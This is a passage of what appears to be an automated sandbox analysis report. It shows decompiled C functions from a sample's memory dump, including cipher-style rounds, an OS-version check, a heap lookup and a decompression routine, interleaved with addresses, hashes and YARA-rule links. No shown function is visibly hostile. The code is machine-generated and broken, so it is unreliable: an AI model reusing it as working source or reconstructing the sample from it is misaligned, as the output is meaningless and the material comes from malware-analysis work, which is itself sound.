					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xa123bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xa123be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xa123bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

























































































                            0x009e3eb3
                            0x009e3ecd
                            0x009e3ed5
                            0x009e3edd
                            0x009e3edd
                            0x009e3ee9
                            0x009e3eec
                            0x009e3eec
                            0x009e3ef8
                            0x009e3efe
                            0x009e3f04
                            0x009e3f0a
                            0x009e3f0e
                            0x009e3f17
                            0x009e3f20
                            0x009e3f26
                            0x009e3f2f
                            0x009e3f39
                            0x009e3f41
                            0x009e3f49
                            0x009e3f51
                            0x009e3f59
                            0x009e3f61
                            0x009e3f65
                            0x009e3f69
                            0x009e3f6d
                            0x009e3f71
                            0x009e3f75
                            0x009e3f7d
                            0x009e3f81
                            0x009e3f85
                            0x009e3f85
                            0x009e3f99
                            0x009e3f9f
                            0x009e3fa3
                            0x009e3fa9
                            0x009e3fac
                            0x009e3fae
                            0x009e3fb0
                            0x009e3fb4
                            0x009e3fb8
                            0x009e3fbb
                            0x009e3fbf
                            0x009e3fd3
                            0x009e3fd9
                            0x009e3fdd
                            0x009e3fe3
                            0x009e3fe6
                            0x009e3fea
                            0x009e3fee
                            0x009e3ff1
                            0x009e3ffd
                            0x009e400f
                            0x009e4015
                            0x009e4019
                            0x009e401f
                            0x009e4022
                            0x009e4024
                            0x009e4026
                            0x009e402a
                            0x009e402e
                            0x009e4031
                            0x009e4035
                            0x009e4049
                            0x009e404f
                            0x009e4053
                            0x009e4059
                            0x009e405c
                            0x009e4060
                            0x009e4064
                            0x009e4067
                            0x009e406f
                            0x009e4083
                            0x009e408b
                            0x009e4091
                            0x009e4094
                            0x009e4096
                            0x009e4098
                            0x009e409c
                            0x009e40a0
                            0x009e40a3
                            0x009e40b3
                            0x009e40b9
                            0x009e40bd
                            0x009e40c3
                            0x009e40c6
                            0x009e40ca
                            0x009e40ce
                            0x009e40d1
                            0x009e40d5
                            0x009e40d9
                            0x009e40eb
                            0x009e40f1
                            0x009e40f5
                            0x009e40fb
                            0x009e40fe
                            0x009e4100
                            0x009e4102
                            0x009e4106
                            0x009e4111
                            0x009e411d
                            0x009e4123
                            0x009e4127
                            0x009e412d
                            0x009e4130
                            0x009e4134
                            0x009e4138
                            0x009e413b
                            0x009e413f
                            0x009e4143
                            0x009e4155
                            0x009e415b
                            0x009e415f
                            0x009e4165
                            0x009e4168
                            0x009e416a
                            0x009e416c
                            0x009e4170
                            0x009e417b
                            0x009e4187
                            0x009e418d
                            0x009e4191
                            0x009e4195
                            0x009e419b
                            0x009e419e
                            0x009e41a0
                            0x009e41a2
                            0x009e41a6
                            0x009e41aa
                            0x009e41ae
                            0x009e41b1
                            0x009e41b5
                            0x009e41b9
                            0x009e41c0
                            0x009e41cd
                            0x009e41cf
                            0x009e41d3
                            0x009e41dd
                            0x009e41e0
                            0x009e41e2
                            0x009e41e4
                            0x009e41e8
                            0x009e41ec
                            0x009e41ef
                            0x009e41ff
                            0x009e4205
                            0x009e4209
                            0x009e420d
                            0x009e4213
                            0x009e4216
                            0x009e4218
                            0x009e421a
                            0x009e421e
                            0x009e4222
                            0x009e4226
                            0x009e4229
                            0x009e422d
                            0x009e4231
                            0x009e4238
                            0x009e4245
                            0x009e424b
                            0x009e424f
                            0x009e4255
                            0x009e4258
                            0x009e425a
                            0x009e425c
                            0x009e4260
                            0x009e4264
                            0x009e4267
                            0x009e4277
                            0x009e427d
                            0x009e4281
                            0x009e4285
                            0x009e428b
                            0x009e428e
                            0x009e4290
                            0x009e4292
                            0x009e4296
                            0x009e4299
                            0x009e429d
                            0x009e42a1
                            0x009e42a5
                            0x009e42a9
                            0x009e42bb
                            0x009e42c1
                            0x009e42c5
                            0x009e42cb
                            0x009e42ce
                            0x009e42d0
                            0x009e42d2
                            0x009e42d6
                            0x009e42e1
                            0x009e42ed
                            0x009e42ef
                            0x009e42f3
                            0x009e42f7
                            0x009e42f9
                            0x009e4300
                            0x009e4302
                            0x009e4304
                            0x009e4308
                            0x009e4310
                            0x009e4313
                            0x009e4316
                            0x009e431a
                            0x009e431e
                            0x009e4322
                            0x009e4326
                            0x009e432a
                            0x009e4335
                            0x009e433c
                            0x009e4343
                            0x009e434a
                            0x009e434e
                            0x009e4352
                            0x009e4359
                            0x009e4359
                            0x009e4366
                            0x009e436a
                            0x009e436d
                            0x009e4370
                            0x009e437f

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: gj
                            • API String ID: 0-4203073231
                            • Opcode ID: 3becbdf449863957aa78e5df365cc5be0173e37e278f63db8396c74add1ebcba
                            • Instruction ID: aaaddcaa11e697b173ab5eafeab433f276bb9d3b275b3736e3719251d13f8718
                            • Opcode Fuzzy Hash: 3becbdf449863957aa78e5df365cc5be0173e37e278f63db8396c74add1ebcba
                            • Instruction Fuzzy Hash: CDF1D2B2A083418FD748CF29D880A1AFBE1BFC8208F19892EF4D8D7715D634E9558F56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EA995, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009EA995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xa1d020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xa200f0; // 0xa
					_t13 =  *0xa200f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xa1d020 = _t12;
					 *0xa200f0 = _t6;
					 *0xa200f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                            0x009ea998
                            0x009ea9a7
                            0x009ea9e5
                            0x009ea9ea
                            0x009ea9a9
                            0x009ea9af
                            0x009ea9ba
                            0x009ea9c0
                            0x009ea9c6
                            0x009ea9cc
                            0x009ea9d2
                            0x009ea9d8
                            0x009ea9dd
                            0x009ea9dd
                            0x009ea9f3
                            0x00000000
                            0x009ea9f5
                            0x00000000
                            0x009ea9f8

                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 009EA9BA
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            • Opcode ID: 61548c67a5f8754965c3e42989aebd754a5f63a5ef1fba002943f59e2cf9708f
                            • Instruction ID: 36c5521fa6918413126e9cbc728c4d18c2505af4452b4a619fe5306d8317545e
                            • Opcode Fuzzy Hash: 61548c67a5f8754965c3e42989aebd754a5f63a5ef1fba002943f59e2cf9708f
                            • Instruction Fuzzy Hash: 15F030B4D042188BD728CB68ED45BF577B9F758310F1042A5DE1543361E774AD82DF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0ACA1, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A0ACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xa40874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                            0x00a0aca1
                            0x00a0aca9
                            0x00a0acb1

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: 0e5045e4d184e695589e090d4270df3da0daae2d8ee735477a403c351418b38a
                            • Instruction ID: 639e1743276e0d66e4cee814c02869cbe82d90ecf913e652c71a7e580882a31e
                            • Opcode Fuzzy Hash: 0e5045e4d184e695589e090d4270df3da0daae2d8ee735477a403c351418b38a
                            • Instruction Fuzzy Hash: 78A02238202200CF8B00CFB0AF0830C3EEABA82AC0308C228A308C3030EB30C032AB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F589E, Relevance: .8, Instructions: 800COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 96%
                            			E009F589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E009F47DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E009F33D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E009F397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E009F4422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E009EA4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E009EA4ED(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E009EA4ED(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E009FEA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E009F20EE();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						goto L1;
																					}
																				}
																				L114:
																				_t403 = _t632 >> 3;
																				__eflags = _t403;
																				 *(_t658 + 0x30) = _t403;
																				_t641 = _t403;
																				do {
																					L115:
																					E009FEA80(_t646, _t468, 8);
																					_t658 = _t658 + 0xc;
																					_t468 = _t468 + 8;
																					_t646 = _t646 + 8;
																					_t632 = _t632 - 8;
																					_t641 = _t641 - 1;
																					__eflags = _t641;
																				} while (_t641 != 0);
																				L116:
																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
																				goto L117;
																			}
																			L109:
																			_t615 = 8;
																			__eflags = _t632 - _t615;
																			if(_t632 < _t615) {
																				goto L117;
																			}
																			L110:
																			_t539 = _t632 >> 3;
																			__eflags = _t539;
																			do {
																				L111:
																				_t632 = _t632 - _t615;
																				 *_t646 =  *_t468;
																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																				_t412 =  *((intOrPtr*)(_t468 + 7));
																				_t468 = _t468 + _t615;
																				 *((char*)(_t646 + 7)) = _t412;
																				_t646 = _t646 + _t615;
																				_t539 = _t539 - 1;
																				__eflags = _t539;
																			} while (_t539 != 0);
																			goto L117;
																		}
																		L105:
																		_push( *(_t638 + 0xe6dc));
																		_push(_t638 + 0x7c);
																		_push( *(_t638 + 0x60));
																		goto L71;
																	}
																	L98:
																	_t417 = E009F1A0E(_t638, _t658 + 0x1c);
																	__eflags = _t417;
																} while (_t417 != 0);
																goto L99;
															}
														}
														L134:
														_t531 = _t638 + (_t322 + 0xb5a) * 4;
														while(1) {
															L135:
															__eflags = _t605 -  *_t531;
															if(_t605 <  *_t531) {
																break;
															}
															L136:
															_t322 = _t322 + 1;
															_t531 = _t531 + 4;
															__eflags = _t322 - 0xf;
